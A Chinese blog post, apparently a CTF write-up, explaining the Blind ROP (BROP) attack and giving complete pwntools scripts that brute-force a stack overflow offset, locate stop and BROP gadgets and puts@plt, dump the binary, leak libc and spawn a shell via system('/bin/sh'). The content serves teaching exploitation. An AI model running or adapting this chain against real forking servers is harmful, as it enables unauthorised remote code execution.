
博客园   2023-04-06 06:31:15







bittau-brop.pdfBROP(Blind ROP),于 2014 年由 Standford 的 Andrea Bittau 提出,这种攻击方式是实现在无源代码和二进程程序的情况下对运行中的程序进行攻击。



我们的目标能让这个程序挂住,能让这个程序泄露,能让这个程序实现人为函数调用,最终我们要控制条件依赖程序存在栈溢出漏洞服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样。nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的这意味着: 栈中的canary是固定的,不会重置利用思路


1.暴力枚举,获取栈溢出长度,如果程序开启了Canary ,顺便将canary也可以爆出来


3.利用stop_gadget寻找可利用(potentially useful)gadgets,如:pop rdi; ret

4.寻找BROP Gadget,可能需要诸如write、put等函数的系统调用






通过爆破确定栈溢出的长度, 如果存在Canary则顺便把Canary爆破出来.爆破Canary也称之为Stack Reading, 因为可以用相同的方式把栈上所有的数据都爆破出来.

+---------------------------+                       |           ret             |                        +---------------------------+                       |            a              | 递增a字符串覆盖ebp位置                ebp--->+---------------------------+                       |            a+             | 递增a字符串占位填满栈空间                       |           ....            |        .....                       |            a+             | 递增a字符串占位填满栈空间                       |            a+             | 递增a字符串占位填满栈空间                       |            a+             | 递增a字符串占位填满栈空间                       |            a+             | 递增a字符串占位填满栈空间        input-->+---------------------------+
def offset_find( ):    offset = 0    while True:        try:            offset += 1            #io = remote("node4.buuoj.cn",25526)            io = process("./pwn")            io.recvuntil(b"Please tell me:")            io.send(b"A"*offset)            if b"Goodbye!" not in io.recvall():                raise "Programe not exit normally!"            io.close()        except Exception:            log.success("The true offset->ebp length is "+ str(offset -1))            return offset - 1


2.寻找stop gadgets:

stop gadget一般指的是这样一段代码:当程序的执行这段代码时,程序会进入无限循环,这样使得攻击者能够一直保持连接状态。

如果该地址是非法地址,那么程序就会crash。这样的话,在攻击者看来程序只是单纯的crash了。因此,攻击者就会认为在这个过程中并没有执行到任何的useful gadget,从而放弃它。


+---------------------------+                       |        0x400000+          | 递增地址覆盖原ret返回位置                       +---------------------------+                       |             a             | a字符覆盖ebp位置                ebp--->+---------------------------+                       |             a             | a字符覆盖ebp位置                       |             a             | a字符覆盖ebp位置                       |             a             | a字符覆盖ebp位置                       |             a             | a字符覆盖ebp位置                       |             a             | a字符覆盖ebp位置       input-->+---------------------------+


def min_find(offset):    #io = remote("node4.buuoj.cn",25526)    io = process("./pwn")    io.recvuntil(b"Please tell me:")    io.send(b"A"*offset)    io.recvuntil(b"A"*offset)    old_return_addr = u64(io.recvuntil(b"G")[:-1].ljust(8,b"\x00")) #need 8 byte    print(hex(old_return_addr))     io.close()    return old_return_addrdef stop_find(old_return_addr,offset):    stop_addr = 0x07d0 #0x0000 #low-bit    while True:        try:            #io = remote("node4.buuoj.cn",25526)            io = process("./pwn")            io.recvuntil(b"Please tell me:")            io.send(b"A" * offset + p64(old_return_addr + stop_addr))            print(hex(stop_addr))            if stop_addr > 0xFFFF:                log.error("All low byte is wrong!")            if b"Hello" in io.recvall( ):                log.success("We found a stop gadget is " + hex(old_return_addr+stop_addr))                return (old_return_addr + stop_addr)            stop_addr = stop_addr + 1        except Exception:            io.close()

第二步完成:我们得到的stop_addr = 0x4007d6

寻找BROP gadgets,这段gadget也就是libc_csu_init中的这段gadget.大家如果接触过retcsu,应该知道有一个这样很特殊的gadget
+---------------------------+                      |         pop rbx           |  0x00                    +---------------------------+                    |         pop rbp           |  0x01                    +---------------------------+                    |         pop r12           |  0x02                    +---------------------------+                    |         pop r13           |  0x04                    +---------------------------+                    |         pop r14           |  0x06                    +---------------------------+------------------->pop rsi;ret 0x07                    |         pop r15           |  0x08                      +---------------------------+------------------->pop rdi;ret 0x09                    |           ret             |  0x10                    -----------------------------//利用了gadget的结构,来确实是否为我们的要的那个gadget                           +---------------------------+    |          traps            | <----- traps,程序中不存在的地址,当IP指针指向该处时崩溃   +---------------------------+   |           ....            | <----- traps,程序中不存在的地址,当IP指针指向该处时崩溃   +---------------------------+   |          traps            | <----- traps,程序中不存在的地址,当IP指针指向该处时崩溃   +---------------------------+   |          traps            | <----- traps,程序中不存在的地址,当IP指针指向该处时崩溃   +---------------------------+   |          traps            | <----- traps,程序中不存在的地址,当IP指针指向该处时崩溃   +---------------------------+   |          stop             | <----- stop gadget,不会使程序崩溃,作为probe的ret位   +---------------------------+   |          probe            | <----- 探针   -----------------------------



+---------------------------+                       |        0           | trap                       +---------------------------+                       |          .....           | trap                       +---------------------------+                       |        0           | trap                       +---------------------------+                       |       stop gadget        | stop gadget作为ret返回地址                       +---------------------------+                       |        0           | trap                       +---------------------------+                       |        0           | trap                       +---------------------------+                       |        0           | trap                       +---------------------------+                       |        0           | trap                       +---------------------------+                       |        0           | trap                       +---------------------------+                       |        0           | trap                       +---------------------------+                       |         0x400740+         | 递增地址覆盖原ret返回位置                       +---------------------------+                       |             a             | a字符串覆盖原saved ebp位置                ebp--->+---------------------------+                       |             a             | a字符串占位填满栈空间                       |           ....            |        .....                       |             a             | a字符串占位填满栈空间                       |             a             | a字符串占位填满栈空间                       |             a             | a字符串占位填满栈空间                       |             a             | a字符串占位填满栈空间        our input-->+---------------------------+
def brop_find(stop_addr,offset):    addr = 0x400950 #0x400000    while True:        try:            #io = remote("node4.buuoj.cn",25526)            io = process("./pwn")            io.recvuntil(b"Please tell me:")            print(hex(addr))                    #careful!            payload = b"a"*offset + p64(addr) + p64(0)*6 + p64(stop_addr)            io.send(payload)            if b"Hello" in io.recvall(timeout=1):                log.success("We find the brop_gadget " + hex(addr))                return hex(addr)            addr += 1        except Exception:            io.close()

第三步完成:我们得到的pop_rdi_ret 为 0x40095a + 0x9



在找的时候,必须有一个回显内容来进行特征标注,告诉我们找到了在没有开启PIE保护的情况下,0x400000处为ELF文件的头部,其内容为’ \ x7fELF’所以我们就利用这个


+---------------------------+                       |       stop gadget        | stop gadget确保程序不崩溃                       +---------------------------+                       |         0x400000+        | 循环递增地址,作为pop的ret地址                       +---------------------------+                       |          0x400000        | ELF起始地址,地址内存放"\x7fELF"                       +---------------------------+                       |        0x40095a + 0x9     | pop rdi;ret地址覆盖原ret返回位置                       +---------------------------+                       |             a             | a字符串覆盖ebp位置                ebp--->+---------------------------+                       |             a             | a字符串占位填满栈空间                       |           ....            |        .....                       |             a             | a字符串占位填满栈空间                       |             a             | a字符串占位填满栈空间                       |             a             | a字符串占位填满栈空间                       |             a             | a字符串占位填满栈空间        our input-->+---------------------------+
def func_plt_find(plt_base, offset, stop_addr, pop_rdi_ret):    maybe_low_byte = 0x0630 #0x0000    while True:        try:            #io = remote("node4.buuoj.cn",25526)            io = process("./pwn")            io.recvuntil(b"Please tell me:")            payload = b"A" * offset            payload += p64(pop_rdi_ret)            payload += p64(0x400000)            payload += p64(plt_base+ maybe_low_byte)            payload += p64(stop_addr)            print(hex(maybe_low_byte))            io.send(payload)            if maybe_low_byte > 0xFFFF:                log.error("All low byte is wrong!")            if b"ELF" in io.recvall(timeout=1):                  log.success("We found a function plt address is " + hex(plt_base + maybe_low_byte))                return hex(plt_base + maybe_low_byte)            maybe_low_byte = maybe_low_byte + 1        except:            io.close()

第四步完成:我们找到的plt的地址为puts_plt = 0x400635



def leak(offset,pop_rdi_ret,func_plt,leak_addr,stop_addr):    io = process("./pwn")    #io = remote("node4.buuoj.cn",25526)    payload = b"a"*offset + p64(pop_rdi_ret) + p64(leak_addr) + p64(func_plt) + p64(stop_addr)    io.recvuntil(b"Please tell me:")    io.sendline(payload)    io.recvuntil(b"a"*offset)    io.recv(3) #0x400635 -> 3byte \x00 stop !!!    try:        output = io.recv(timeout = 1)        io.close()        try:            output = output[:output.index(b"\nHello,I am a computer")]            print(output)        except Exception:            output = output        if output == b"":            output = b"\x00"        return output    except Exception:        io.close()        return Nonedef dump_file(offset,pop_rdi_ret,puts_plt,addr,stop_addr):    result =b""    while addr < 0x400835:       print(hex(addr))       output = leak(offset, pop_rdi_ret,puts_plt,addr,stop_addr)       if output is None:          result += b"\x00"          addr += 1          continue       else:          result += output       addr += len(output)       with open("dump_file","wb") as f:          f.write(result)





def attack(offset,pop_rdi_ret,puts_got,puts_plt,stop_addr):    context(log_level="debug",arch = "amd64",os = "linux")    io = process("./pwn")    #io = remote("node4.buuoj.cn",27462)    #libc = ELF("./libc-2.23.so")    elf = ELF("./pwn")    libc = elf.libc    ret = 0x40095a + 0x9 + 0x5    payload = b"a"*offset    payload += p64(pop_rdi_ret)    payload += p64(puts_got)    payload += p64(puts_plt)    payload += p64(stop_addr)    io.recvuntil(b"Please tell me:")    io.sendline(payload)    io.recvuntil(b"a"*offset)    io.recv(3)    func_addr = io.recv(6)    puts_address = u64(func_addr.ljust(8,b"\x00"))    print(hex(puts_address))    #libc=LibcSearcher("puts",puts_address)    #libcbase=puts_address-libc.dump("puts")    #system_address=libcbase+libc.dump("system")    #bin_sh=libcbase+libc.dump("str_bin_sh")    libcbase = puts_address - libc.symbols["puts"]    system_address = libcbase + libc.symbols["system"]    bin_sh = libcbase + next(libc.search(b"/bin/sh\x00"))    io.recvuntil(b"Please tell me:")    payload = b"a"*offset + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_address) + p64(stop_addr)    io.sendline(payload)    io.interactive()





from pwn import *from LibcSearcher import *def offset_find( ):    offset = 0    while True:        try:            offset += 1            #io = remote("node4.buuoj.cn",25526)            io = process("./pwn")            io.recvuntil(b"Please tell me:")            io.send(b"A"*offset)            if b"Goodbye!" not in io.recvall():                raise "Programe not exit normally!"            io.close()        except Exception:            log.success("The true offset->ebp length is "+ str(offset -1))            return offset - 1def min_find(offset):    #io = remote("node4.buuoj.cn",25526)    io = process("./pwn")    io.recvuntil(b"Please tell me:")    io.send(b"A"*offset)    io.recvuntil(b"A"*offset)    old_return_addr = u64(io.recvuntil(b"G")[:-1].ljust(8,b"\x00")) #need 8 byte    print(hex(old_return_addr))     io.close()    return old_return_addrdef stop_find(old_return_addr,offset):    stop_addr = 0x07d0 #0x0000 #low-bit    while True:        try:            #io = remote("node4.buuoj.cn",25526)            io = process("./pwn")            io.recvuntil(b"Please tell me:")            io.send(b"A" * offset + p64(old_return_addr + stop_addr))            print(hex(stop_addr))            if stop_addr > 0xFFFF:                log.error("All low byte is wrong!")            if b"Hello" in io.recvall( ):                log.success("We found a stop gadget is " + hex(old_return_addr+stop_addr))                return (old_return_addr + stop_addr)            stop_addr = stop_addr + 1        except Exception:            io.close()def brop_find(stop_addr,offset):    addr = 0x400950 #0x400000    while True:        try:            #io = remote("node4.buuoj.cn",25526)            io = process("./pwn")            io.recvuntil(b"Please tell me:")            print(hex(addr))                    #careful!            payload = b"a"*offset + p64(addr) + p64(0)*6 + p64(stop_addr)            io.send(payload)            if b"Hello" in io.recvall(timeout=1):                log.success("We find the brop_gadget " + hex(addr))                return hex(addr)            addr += 1        except Exception:            io.close()def func_plt_find(plt_base, offset, stop_addr, pop_rdi_ret):    maybe_low_byte = 0x0630 #0x0000    while True:        try:            #io = remote("node4.buuoj.cn",25526)            io = process("./pwn")            io.recvuntil(b"Please tell me:")            payload = b"A" * offset            payload += p64(pop_rdi_ret)            payload += p64(0x400000)            payload += p64(plt_base+ maybe_low_byte)            payload += p64(stop_addr)            print(hex(maybe_low_byte))            io.send(payload)            if maybe_low_byte > 0xFFFF:                log.error("All low byte is wrong!")            if b"ELF" in io.recvall(timeout=1):                  log.success("We found a function plt address is " + hex(plt_base + maybe_low_byte))                return hex(plt_base + maybe_low_byte)            maybe_low_byte = maybe_low_byte + 1        except:            io.close()def leak(offset,pop_rdi_ret,func_plt,leak_addr,stop_addr):    io = process("./pwn")    #io = remote("node4.buuoj.cn",25526)    payload = b"a"*offset + p64(pop_rdi_ret) + p64(leak_addr) + p64(func_plt) + p64(stop_addr)    io.recvuntil(b"Please tell me:")    io.sendline(payload)    io.recvuntil(b"a"*offset)    io.recv(3) #0x400635 -> 3byte \x00 stop !!!    try:        output = io.recv(timeout = 1)        io.close()        try:            output = output[:output.index(b"\nHello,I am a computer")]            print(output)        except Exception:            output = output        if output == b"":            output = b"\x00"        return output    except Exception:        io.close()        return Nonedef dump_file(offset,pop_rdi_ret,puts_plt,addr,stop_addr):    result =b""    while addr < 0x400835:       print(hex(addr))       output = leak(offset, pop_rdi_ret,puts_plt,addr,stop_addr)       if output is None:          result += b"\x00"          addr += 1          continue       else:          result += output       addr += len(output)       with open("dump_file","wb") as f:          f.write(result)def attack(offset,pop_rdi_ret,puts_got,puts_plt,stop_addr):    context(log_level="debug",arch = "amd64",os = "linux")    io = process("./pwn")    #io = remote("node4.buuoj.cn",27462)    #libc = ELF("./libc-2.23.so")    elf = ELF("./pwn")    libc = elf.libc    ret = 0x40095a + 0x9 + 0x5    payload = b"a"*offset    payload += p64(pop_rdi_ret)    payload += p64(puts_got)    payload += p64(puts_plt)    payload += p64(stop_addr)    io.recvuntil(b"Please tell me:")    io.sendline(payload)    io.recvuntil(b"a"*offset)    io.recv(3)    func_addr = io.recv(6)    puts_address = u64(func_addr.ljust(8,b"\x00"))    print(hex(puts_address))    #libc=LibcSearcher("puts",puts_address)    #libcbase=puts_address-libc.dump("puts")    #system_address=libcbase+libc.dump("system")    #bin_sh=libcbase+libc.dump("str_bin_sh")    libcbase = puts_address - libc.symbols["puts"]    system_address = libcbase + libc.symbols["system"]    bin_sh = libcbase + next(libc.search(b"/bin/sh\x00"))    io.recvuntil(b"Please tell me:")    payload = b"a"*offset + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_address) + p64(stop_addr)    io.sendline(payload)    io.interactive()offset = 216 #offset_find()old_return_addr = 0x400000 #min_find(offset) #0x400834stop_addr = 0x4007d6 #stop_find(old_return_addr,offset) #0x4007d6brop_gadget = 0x40095a #brop_find(stop_addr,offset) #0x40095apop_rdi_ret =brop_gadget + 0x9plt_base = 0x400000puts_plt = 0x400635 #func_plt_find(plt_base,offset,stop_addr,pop_rdi_ret)puts_got = 0x601018 #dump_file(offset,pop_rdi_ret,puts_plt,0x400000,stop_addr)#offset_find()#min_find(offset) #stop_find(old_return_addr,offset) #brop_find(stop_addr,offset) #func_plt_find(plt_base,offset,stop_addr,pop_rdi_ret)#dump_file(offset,pop_rdi_ret,puts_plt,0x400000,stop_addr)attack(offset,pop_rdi_ret,puts_got,puts_plt,stop_addr)
#谢谢你的观看!^ _ ^
